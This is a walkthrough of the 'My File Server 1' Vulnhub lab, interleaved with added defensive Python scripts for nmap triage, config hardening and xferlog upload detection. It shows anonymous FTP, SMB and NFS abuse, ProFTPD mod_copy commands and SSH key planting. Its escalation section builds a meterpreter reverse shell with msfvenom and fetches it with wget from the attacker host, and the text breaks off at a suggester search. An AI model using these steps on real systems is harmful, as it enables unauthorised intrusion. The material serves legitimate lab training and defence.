Vulnhub: My File Server 1 target machine, detailed test walkthrough (local privilege escalation with the Metasploit tool, great!)

Published 2023-04-03 12:46:15 Author: Jason_huawen

My File Server 1

Identify the target host's IP address

┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer1]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                                                        
                                                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                                                           
 192.168.56.100  08:00:27:15:69:14      1      60  PCS Systemtechnik GmbH                                                                                   
 192.168.56.241  08:00:27:18:01:4f      1      60  PCS Systemtechnik GmbH             

Using Kali Linux's netdiscover tool, the target host's IP address is identified as 192.168.56.241.

NMAP scan

┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer1]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.241 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-02 23:03 EDT
Nmap scan report for bogon (192.168.56.241)
Host is up (0.00038s latency).
Not shown: 64445 filtered tcp ports (no-response), 78 filtered tcp ports (host-prohibited), 1004 closed tcp ports (reset)
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 3.0.2
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.56.230
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    3 0        0              16 Feb 19  2020 pub [NSE: writeable]
22/tcp    open  ssh         OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 75:fa:37:d1:62:4a:15:87:7e:21:83:b9:2f:ff:04:93 (RSA)
|   256 b8:db:2c:ca:e2:70:c3:eb:9a:a8:cc:0e:a2:1c:68:6b (ECDSA)
|_  256 66:a3:1b:55:ca:c2:51:84:41:21:7f:77:40:45:d4:9f (ED25519)
80/tcp    open  http        Apache httpd 2.4.6 ((CentOS))
|_http-title: My File Server
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS)
111/tcp   open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100003  3,4         2049/udp   nfs
|   100003  3,4         2049/udp6  nfs
|   100005  1,2,3      20048/tcp   mountd
|   100005  1,2,3      20048/tcp6  mountd
|   100005  1,2,3      20048/udp   mountd
|   100005  1,2,3      20048/udp6  mountd
|   100021  1,3,4      40616/tcp   nlockmgr
|   100021  1,3,4      40682/udp6  nlockmgr
|   100021  1,3,4      55421/udp   nlockmgr
|   100021  1,3,4      55961/tcp6  nlockmgr
|   100024  1          36550/tcp   status
|   100024  1          43557/tcp6  status
|   100024  1          54267/udp6  status
|   100024  1          54358/udp   status
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
445/tcp   open  netbios-ssn Samba smbd 4.9.1 (workgroup: SAMBA)
2049/tcp  open  nfs_acl     3 (RPC #100227)
2121/tcp  open  ftp         ProFTPD 1.3.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: ERROR
20048/tcp open  mountd      1-3 (RPC #100005)
MAC Address: 08:00:27:18:01:4F (Oracle VirtualBox virtual NIC)
Service Info: Host: FILESERVER; OS: Unix

Host script results:
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-04-03T03:05:13
|_  start_date: N/A
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.1)
|   Computer name: localhost
|   NetBIOS computer name: FILESERVER\x00
|   Domain name: \x00
|   FQDN: localhost
|_  System time: 2023-04-03T08:35:11+05:30
|_clock-skew: mean: -1h50m01s, deviation: 3h10m31s, median: -1s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 86.16 seconds
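As an added example (not part of the original post), here is a small Python triage script for nmap's normal (-oN) output that pulls out the findings a defender would raise tickets for from a scan like the one above: anonymous FTP, an anonymous-writable directory, HTTP TRACE, NFS exports and disabled SMB signing. The embedded report is a constructed, abridged sample modelled on the scan output; the severity labels are this script's own choice, not nmap's.

```python
import re

# Constructed, abridged sample in nmap's normal (-oN) format, modelled on the
# scan above; not the full report.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for bogon (192.168.56.241)
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    3 0        0              16 Feb 19  2020 pub [NSE: writeable]
22/tcp    open  ssh         OpenSSH 7.4 (protocol 2.0)
80/tcp    open  http        Apache httpd 2.4.6 ((CentOS))
| http-methods:
|_  Potentially risky methods: TRACE
445/tcp   open  netbios-ssn Samba smbd 4.9.1 (workgroup: SAMBA)
2049/tcp  open  nfs_acl     3 (RPC #100227)
2121/tcp  open  ftp         ProFTPD 1.3.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
Host script results:
| smb-security-mode:
|_  message_signing: disabled (dangerous, but default)
"""

# "21/tcp    open  ftp         vsftpd 3.0.2" -> (21, tcp, ftp, "vsftpd 3.0.2")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")


def parse_open_ports(text):
    """Return [(port, proto, service, version)] for every open-port line."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports.append((int(m.group(1)), m.group(2), m.group(3), m.group(4).strip()))
    return ports


def triage(text):
    """Attach NSE script lines to the port line they follow and return
    [(port, severity, finding)].  Host-level script results get port None.
    Severity labels are this script's own choice, not nmap's."""
    findings, port = [], None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, service, version = int(m.group(1)), m.group(3), m.group(4).strip()
            if service == "ftp":
                findings.append((port, "info", f"FTP exposed: {version}"))
            elif service in ("nfs", "nfs_acl"):
                findings.append((port, "medium", "NFS exported; review /etc/exports scope and root_squash"))
            continue
        if line.startswith("Host script results"):
            port = None
            continue
        if "Anonymous FTP login allowed" in line:
            findings.append((port, "high", "anonymous FTP login allowed"))
        if "[NSE: writeable]" in line:
            findings.append((port, "critical", "anonymous-writable FTP directory"))
        if "Potentially risky methods" in line and "TRACE" in line:
            findings.append((port, "low", "HTTP TRACE enabled"))
        if "message_signing: disabled" in line:
            findings.append((port, "medium", "SMB message signing disabled"))
    return findings


def summarize(findings):
    """Count findings per severity, e.g. {'critical': 1, 'high': 2, ...}."""
    counts = {}
    for _port, sev, _msg in findings:
        counts[sev] = counts.get(sev, 0) + 1
    return counts


if __name__ == "__main__":
    for port, sev, msg in triage(SAMPLE_NMAP_OUTPUT):
        print(f"{str(port or 'host'):>5}  {sev:<8}  {msg}")
```

Run it against a real `-oN` file by reading the file into `triage()`; the parser keys off nmap's fixed `PORT/PROTO open SERVICE VERSION` layout and the literal NSE strings, so it does not depend on the exact script list in use.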

Getting a shell

Port 21

┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer1]
└─$ ftp 192.168.56.241
Connected to 192.168.56.241.
220 (vsFTPd 3.0.2)
Name (192.168.56.241:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||5022|).
150 Here comes the directory listing.
drwxr-xr-x    3 0        0              16 Feb 18  2020 .
drwxr-xr-x    3 0        0              16 Feb 18  2020 ..
drwxrwxrwx    3 0        0              16 Feb 19  2020 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||5027|).
150 Here comes the directory listing.
drwxrwxrwx    3 0        0              16 Feb 19  2020 .
drwxr-xr-x    3 0        0              16 Feb 18  2020 ..
drwxr-xr-x    9 0        0            4096 Feb 19  2020 log
226 Directory send OK.
ftp> cd log
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||5396|).
150 Here comes the directory listing.
drwxr-xr-x    9 0        0            4096 Feb 19  2020 .
drwxrwxrwx    3 0        0              16 Feb 19  2020 ..
drwxr-xr-x    2 0        0            4096 Feb 19  2020 anaconda
drwxr-x---    2 0        0              22 Feb 19  2020 audit
-rw-r--r--    1 0        0            7033 Feb 19  2020 boot.log
-rw-------    1 0        0           10752 Feb 19  2020 btmp
-rw-r--r--    1 0        0            9161 Feb 19  2020 cron
-rw-r--r--    1 0        0           31971 Feb 19  2020 dmesg
-rw-r--r--    1 0        0           31971 Feb 19  2020 dmesg.old
drwxr-xr-x    2 0        0               6 Feb 19  2020 glusterfs
drwx------    2 0        0              39 Feb 19  2020 httpd
-rw-r--r--    1 0        0          292584 Feb 19  2020 lastlog
-rw-------    1 0        0            3764 Feb 19  2020 maillog
-rw-------    1 0        0         1423423 Feb 19  2020 messages
drwx------    2 0        0               6 Feb 19  2020 ppp
drwx------    4 0        0              43 Feb 19  2020 samba
-rw-------    1 0        0           63142 Feb 19  2020 secure
-rw-------    1 0        0               0 Feb 19  2020 spooler
-rw-------    1 0        0               0 Feb 19  2020 tallylog
drwxr-xr-x    2 0        0              22 Feb 19  2020 tuned
-rw-r--r--    1 0        0           58752 Feb 19  2020 wtmp
-rw-------    1 0        0             100 Feb 19  2020 xferlog
-rw-------    1 0        0           18076 Feb 19  2020 yum.log
226 Directory send OK.

Port 2121

┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer1]
└─$ ftp 192.168.56.241 -P 2121
Connected to 192.168.56.241.
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [192.168.56.241]
Name (192.168.56.241:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password: 
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||18594|)
ftp: Can't connect to `192.168.56.241:18594': No route to host
200 EPRT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x   3 root     root           16 Feb 18  2020 .
drwxr-xr-x   3 root     root           16 Feb 18  2020 ..
drwxrwxrwx   3 root     root           16 Feb 19  2020 pub
226 Transfer complete
ftp> cd pub
250 CWD command successful
ftp> ls -alh
200 EPRT command successful
150 Opening ASCII mode data connection for file list
drwxrwxrwx   3 root     root           16 Feb 19  2020 .
drwxr-xr-x   3 root     root           16 Feb 18  2020 ..
drwxr-xr-x   9 root     root         4.0k Feb 19  2020 log
226 Transfer complete

The directory served on port 2121 is the same as the one on port 21.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer1]
└─$ searchsploit proFTPD 1.3.5                                 
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                             |  Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit)                                                                  | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution                                                                        | linux/remote/36803.py
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)                                                                    | linux/remote/49908.py
ProFTPd 1.3.5 - File Copy                                                                                                  | linux/remote/36742.txt
-------------------------------------------------------------------------------------------------

ProFTPd has the mod_copy vulnerability.

Port 445

┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer1]
└─$ smbclient //192.168.56.241/smbdata
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Feb 20 06:07:55 2020
  ..                                  D        0  Tue Feb 18 06:47:54 2020
  anaconda                            D        0  Tue Feb 18 06:48:15 2020
  audit                               D        0  Tue Feb 18 06:48:15 2020
  boot.log                            N     6120  Tue Feb 18 06:48:16 2020
  btmp                                N      384  Tue Feb 18 06:48:16 2020
  cron                                N     4813  Tue Feb 18 06:48:16 2020
  dmesg                               N    31389  Tue Feb 18 06:48:16 2020
  dmesg.old                           N    31389  Tue Feb 18 06:48:16 2020
  glusterfs                           D        0  Tue Feb 18 06:48:16 2020
  lastlog                             N   292292  Tue Feb 18 06:48:16 2020
  maillog                             N     1982  Tue Feb 18 06:48:16 2020
  messages                            N   684379  Tue Feb 18 06:48:17 2020
  ppp                                 D        0  Tue Feb 18 06:48:17 2020
  samba                               D        0  Tue Feb 18 06:48:17 2020
  secure                              N    11937  Tue Feb 18 06:48:17 2020
  spooler                             N        0  Tue Feb 18 06:48:17 2020
  tallylog                            N        0  Tue Feb 18 06:48:17 2020
  tuned                               D        0  Tue Feb 18 06:48:17 2020
  wtmp                                N    25728  Tue Feb 18 06:48:17 2020
  xferlog                             N      100  Tue Feb 18 06:48:17 2020
  yum.log                             N    10915  Tue Feb 18 06:48:17 2020
  sshd_config                         N     3906  Wed Feb 19 02:46:38 2020

                19976192 blocks of size 1024. 18285512 blocks available
smb: \> put test.txt 
putting file test.txt as \test.txt (5.9 kb/s) (average 5.9 kb/s)
smb: \> pwd
Current directory is \\192.168.56.241\smbdata\

Files can be uploaded via SMB.


┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer1]
└─$ enum4linux 192.168.56.241
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''                                                                                  
                                                                                                                                                             
S-1-22-1-1000 Unix User\smbuser (Local User)       

With the enum4linux tool the username smbuser can be identified.

Port 2049

┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer1]
└─$ showmount -e 192.168.56.241       
Export list for 192.168.56.241:
/smbdata 192.168.56.0/24
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer1]
└─$ mkdir sharedata    
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer1]
└─$ sudo mount -t nfs 192.168.56.241:/smbdata sharedata        
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer1]
└─$ cd sharedata    

Files can be uploaded to the target host over NFS.
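Ports 21, 2121, 445 and 2049 above are all reachable anonymously, and the searchsploit hit on ProFTPD 1.3.5 points at mod_copy. As an added example, not from the post or from the box itself, the following Python script lints the four relevant configuration files (vsftpd.conf, proftpd.conf, smb.conf and /etc/exports) for exactly those weaknesses, with a weak and a corrected fragment side by side where it matters. All sample fragments are constructed; the `<Limit SITE_CPFR SITE_CPTO>` / `DenyAll` block is the upstream-documented way to refuse mod_copy's SITE commands while the module stays loaded, and upgrading ProFTPD to a fixed release is the real fix.

```python
import re

# Constructed sample fragments (not the box's real files), modelled on what
# the enumeration above implies: anonymous FTP with a writable pub, mod_copy
# loaded with no limit, a guest-writable SMB share, an export to the whole /24.
WEAK_VSFTPD = """\
anonymous_enable=YES
local_enable=YES
write_enable=YES
anon_upload_enable=YES
chroot_local_user=NO
"""
HARDENED_VSFTPD = """\
anonymous_enable=NO
local_enable=YES
write_enable=YES
chroot_local_user=YES
"""
WEAK_PROFTPD = """\
LoadModule mod_copy.c
<Anonymous ~ftp>
  User ftp
</Anonymous>
"""
HARDENED_PROFTPD = """\
LoadModule mod_copy.c
<Limit SITE_CPFR SITE_CPTO>
  DenyAll
</Limit>
"""
WEAK_SMB = """\
[global]
   workgroup = SAMBA
[smbdata]
   path = /smbdata
   guest ok = yes
   writable = yes
"""
WEAK_EXPORTS = "/smbdata 192.168.56.0/24(rw,no_root_squash)\n"


def kv(text):
    """Parse key=value lines (vsftpd style); '#' comments and blanks skipped."""
    out = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if "=" in line:
            k, v = line.split("=", 1)
            out[k.strip().lower()] = v.strip().upper()
    return out


def check_vsftpd(text):
    c, issues = kv(text), []
    if c.get("anonymous_enable") == "YES":
        issues.append("anonymous_enable=YES: anonymous logins allowed")
        if "YES" in (c.get("anon_upload_enable"), c.get("anon_mkdir_write_enable")):
            issues.append("anonymous users may write to the server")
    if c.get("local_enable") == "YES" and c.get("chroot_local_user") != "YES":
        issues.append("chroot_local_user is not YES: local users can roam the filesystem")
    return issues


def check_proftpd(text):
    # \s also matches newlines, so the Limit block may span several lines
    loaded = re.search(r"^\s*LoadModule\s+mod_copy\.c", text, re.M)
    limited = re.search(r"<Limit\s+SITE_CPFR\s+SITE_CPTO>\s*DenyAll\s*</Limit>", text, re.I)
    if loaded and not limited:
        return ["mod_copy loaded without <Limit SITE_CPFR SITE_CPTO> DenyAll"]
    return []


def check_smb(text):
    """smb.conf: flag non-global shares that are guest-accessible and writable."""
    shares, name, opts = [], None, {}
    for line in text.splitlines() + ["[end]"]:   # sentinel flushes the last share
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            if name is not None:
                shares.append((name, opts))
            name, opts = line[1:-1], {}
        elif "=" in line:
            k, v = line.split("=", 1)
            opts[k.strip().lower()] = v.strip().lower()
    issues = []
    for share, o in shares:
        if share == "global":
            continue
        guest = "yes" in (o.get("guest ok"), o.get("public"))
        writable = "yes" in (o.get("writable"), o.get("writeable")) or o.get("read only") == "no"
        if guest and writable:
            issues.append(f"share [{share}] is guest-accessible and writable")
        elif guest:
            issues.append(f"share [{share}] allows guest access")
    return issues


def check_exports(text):
    issues = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        path, _, clients = line.partition(" ")
        for spec in clients.split():
            host, _, opts = spec.partition("(")
            opts = opts.rstrip(")").split(",")
            if host in ("", "*") or "/" in host:   # wildcard or whole subnet
                issues.append(f"{path}: exported to {host or '*'}, not to named hosts")
            if "no_root_squash" in opts:
                issues.append(f"{path}: no_root_squash lets client root write as root")
    return issues
```

Point each `check_*` function at the real file contents on the host; an empty list means the fragment passed. The SMB check treats `guest ok`/`public` and `writable`/`writeable`/`read only = no` as equivalent spellings, which is how Samba reads them.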

Port 80

┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer1]
└─$ gobuster dir -u http://192.168.56.241 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.js,.sh
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.241
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              php,html,txt,js,sh
[+] Timeout:                 10s
===============================================================
2023/04/02 23:36:54 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 207]
/index.html           (Status: 200) [Size: 174]
/readme.txt           (Status: 200) [Size: 25]

┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer1]
└─$ curl http://192.168.56.241/readme.txt                      
My Password is
rootroot1

Next we can generate our own SSH public key, upload it to the smbdata directory over SMB, and use ProFTPD's mod_copy vulnerability to move it to /home/smbuser/.ssh/authorized_keys (renaming it in the process).

┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer1]
└─$ ssh-keygen                                         
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa): id_rsa
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in id_rsa
Your public key has been saved in id_rsa.pub
The key fingerprint is:
SHA256:omJWVH15Va1fXgFh8RuzDRXjgsYfv+nmDJNXu7rvoZY kali@kali
The key's randomart image is:
+---[RSA 3072]----+
|      ..   . *=+=|
|     .  . + + ooo|
|    .    . = o.*.|
|   .      . . =.O|
|    . . S    . *=|
|   . . .      . B|
|  + .        +.* |
| o .         EB.o|
|            .+BB |
+----[SHA256]-----+
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer1]
└─$ ls -alh
total 28K
drwxr-xr-x  3 kali kali 4.0K Apr  2 23:14 .
drwxr-xr-x 15 kali kali 4.0K Apr  2 22:59 ..
-rw-------  1 kali kali 2.6K Apr  2 23:14 id_rsa
-rw-r--r--  1 kali kali  563 Apr  2 23:14 id_rsa.pub
-rw-r--r--  1 root root 3.6K Apr  2 23:05 nmap_full_scan
drwxrwxrwx  8 root root 4.0K Apr  2 23:09 sharedata
-rw-r--r--  1 kali kali   12 Apr  2 23:08 test.txt

┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer1]
└─$ smbclient //192.168.56.241/smbdata
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> put id_rsa.pub 
putting file id_rsa.pub as \id_rsa.pub (137.4 kb/s) (average 137.5 kb/s)
smb: \> quit

┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer1]
└─$ telnet 192.168.56.241 2121
Trying 192.168.56.241...
Connected to 192.168.56.241.
Escape character is '^]'.
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [192.168.56.241]
SITE CPFR /smbdata/id_rsa.pub
350 File or directory exists, ready for destination name
SITE CPTO /home/smbuser/.ssh/authorized_keys
550 CPTO: Permission denied

Error: no permission to copy to /home/smbuser/.ssh/authorized_keys.

But we already found a password earlier; could it be the FTP password?

┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer1]
└─$ ftp 192.168.56.241        
Connected to 192.168.56.241.
220 (vsFTPd 3.0.2)
Name (192.168.56.241:kali): smbuser
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||5356|).
150 Here comes the directory listing.
drwx------    2 1000     1000           79 Feb 18  2020 .
drwxr-xr-x    3 0        0              20 Feb 19  2020 ..
-rw-------    1 1000     1000           27 Feb 20  2020 .bash_history
-rw-r--r--    1 1000     1000           18 Mar 05  2015 .bash_logout
-rw-r--r--    1 1000     1000          193 Mar 05  2015 .bash_profile
-rw-r--r--    1 1000     1000          231 Mar 05  2015 .bashrc

This appears to be smbuser's home directory.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer1]
└─$ mv id_rsa.pub authorized_keys

┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer1]
└─$ ftp 192.168.56.241        
Connected to 192.168.56.241.
220 (vsFTPd 3.0.2)
Name (192.168.56.241:kali): smbuser
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||5356|).
150 Here comes the directory listing.
drwx------    2 1000     1000           79 Feb 18  2020 .
drwxr-xr-x    3 0        0              20 Feb 19  2020 ..
-rw-------    1 1000     1000           27 Feb 20  2020 .bash_history
-rw-r--r--    1 1000     1000           18 Mar 05  2015 .bash_logout
-rw-r--r--    1 1000     1000          193 Mar 05  2015 .bash_profile
-rw-r--r--    1 1000     1000          231 Mar 05  2015 .bashrc
226 Directory send OK.
ftp> cat .bash_history
?Invalid command.
ftp> mkdir .ssh
257 "/home/smbuser/.ssh" created
ftp> cd .ssh
250 Directory successfully changed.
ftp> put authorized_keys 
local: authorized_keys remote: authorized_keys
229 Entering Extended Passive Mode (|||5958|).
150 Ok to send data.
100% |****************************************************************************************************************|   563       14.51 MiB/s    00:00 ETA
226 Transfer complete.
563 bytes sent in 00:00 (17.92 KiB/s)

The public key (renamed to authorized_keys) was successfully uploaded into smbuser's home directory on the target host.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer1]
└─$ chmod 400 id_rsa                    
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer1]
└─$ ssh -i id_rsa smbuser@192.168.56.241
The authenticity of host '192.168.56.241 (192.168.56.241)' can't be established.
ED25519 key fingerprint is SHA256:ccn0TgE4/OXtSpg3oMO2gVNYXrps4Zi+XcBgaDZnW78.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:7: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.241' (ED25519) to the list of known hosts.
   ##############################################################################################
   #                                      Armour Infosec                                        #
   #                         --------- www.armourinfosec.com ------------                       #
   #                                    My File Server - 1                                      #
   #                               Designed By  :- Akanksha Sachin Verma                        #
   #                               Twitter      :- @akankshavermasv                             #
   ##############################################################################################

Last login: Thu Feb 20 16:42:21 2020
[smbuser@fileserver ~]$ id
uid=1000(smbuser) gid=1000(smbuser) groups=1000(smbuser)
[smbuser@fileserver ~]$ 

At this point we have a shell as smbuser.
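The foothold above came from a public key written into ~/.ssh/authorized_keys over a plain FTP login using a password found on the web server. From the detection side, FTP servers that write the standard xferlog format (vsftpd with xferlog_std_format=YES, or ProFTPD's TransferLog) record every transfer with its path, direction and access mode. As an added example, not from the post, this Python script parses a few constructed xferlog lines and flags uploads by anonymous users and uploads into .ssh or shell start-up files. The field layout follows the xferlog(5) manual page; the sample lines and the sensitive-name list are constructed.

```python
from collections import namedtuple

# Constructed xferlog lines (one transfer per line).  Fields after the
# five-token date: transfer-time remote-host size path transfer-type
# special-action direction(i=upload,o=download) access-mode(a=anonymous,
# r=real,g=guest) username service auth-method auth-user-id completion-status
SAMPLE_XFERLOG = """\
Mon Apr  3 09:10:02 2023 1 192.168.56.230 563 /smbdata/id_rsa.pub b _ i a anonymous ftp 0 * c
Mon Apr  3 09:14:58 2023 1 192.168.56.230 563 /home/smbuser/.ssh/authorized_keys b _ i r smbuser ftp 0 * c
Mon Apr  3 09:20:11 2023 2 192.168.56.230 7033 /pub/log/boot.log b _ o a anonymous ftp 0 * c
Mon Apr  3 09:22:40 2023 1 192.168.56.230 12 /home/smbuser/notes.txt a _ i r smbuser ftp 0 * c
"""

Transfer = namedtuple(
    "Transfer", "timestamp remote_host size path direction access_mode user status"
)

# Files whose creation over FTP grants or shapes interactive access
SENSITIVE_NAMES = {"authorized_keys", "authorized_keys2", ".bashrc",
                   ".bash_profile", ".profile"}


def parse_xferlog_line(line):
    """Return a Transfer for a well-formed xferlog line, else None.
    xferlog replaces spaces in file names with underscores, so a plain
    split() yields exactly 18 tokens for a valid record."""
    parts = line.split()
    if len(parts) != 18:
        return None
    ts = " ".join(parts[:5])
    (_xfer_time, host, size, path, _ttype, _special, direction,
     access_mode, user, _svc, _auth, _uid, status) = parts[5:]
    return Transfer(ts, host, int(size), path, direction, access_mode, user, status)


def classify(t):
    """Reasons this transfer deserves an alert (empty list if none)."""
    reasons = []
    if t.direction != "i":          # only uploads are of interest here
        return reasons
    if t.access_mode == "a":
        reasons.append("anonymous upload")
    name = t.path.rsplit("/", 1)[-1]
    if "/.ssh/" in t.path or name in SENSITIVE_NAMES:
        reasons.append("upload into SSH or shell start-up file")
    return reasons


def scan(text):
    """Return [(timestamp, user, path, reason)] over a block of log text."""
    alerts = []
    for line in text.splitlines():
        t = parse_xferlog_line(line)
        if t is None:
            continue
        for reason in classify(t):
            alerts.append((t.timestamp, t.user, t.path, reason))
    return alerts


if __name__ == "__main__":
    for ts, user, path, reason in scan(SAMPLE_XFERLOG):
        print(f"{ts}  {user:<10} {path:<40} {reason}")
```

Feed the real log with `scan(open("/var/log/xferlog").read())`; pair the second rule with a file-integrity or auditd watch on `~/.ssh/authorized_keys`, since a key dropped over SMB or NFS never passes through the FTP log at all.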

Privilege escalation

Next, use Metasploit for local privilege escalation.

  1. Create the payload with msfvenom

    ┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer1]
    └─$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.230 LPORT=5555 -f elf -o escalate.elf
    
    
  2. Upload the payload to the target host's /tmp directory and make it executable

    [smbuser@fileserver tmp]$ wget http://192.168.56.230:8000/escalate.elf
    --2023-04-03 09:14:58--  http://192.168.56.230:8000/escalate.elf
    Connecting to 192.168.56.230:8000... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 207 [application/octet-stream]
    Saving to: ‘escalate.elf’
    
    100%[===================================================================================================================>] 207         --.-K/s   in 0s      
    
    2023-04-03 09:14:58 (47.7 MB/s) - ‘escalate.elf’ saved [207/207]
    
    [smbuser@fileserver tmp]$ chmod +x escalate.elf 
    
    
  3. Start msfconsole on Kali, select the multi/handler module and start the listener (the payload must match the one used with msfvenom)

    /x86/meterpreter/reverse_tcp
    payload => linux/x86/meterpreter/reverse_tcp
    msf6 exploit(multi/handler) > show options 
    
    Module options (exploit/multi/handler):
    
       Name  Current Setting  Required  Description
       ----  ---------------  --------  -----------
    
    
    Payload options (linux/x86/meterpreter/reverse_tcp):
    
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       LHOST                   yes       The listen address (an interface may be specified)
       LPORT  4444             yes       The listen port
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Wildcard Target
    
    
    msf6 exploit(multi/handler) > set LHOST 192.168.56.230
    LHOST => 192.168.56.230
    msf6 exploit(multi/handler) > set LPORT 5555
    LPORT => 5555
    msf6 exploit(multi/handler) > run
    
    
  4. Run ./escalate.elf on the target host; a meterpreter session is obtained on Kali Linux

    msf6 exploit(multi/handler) > search suggester
    
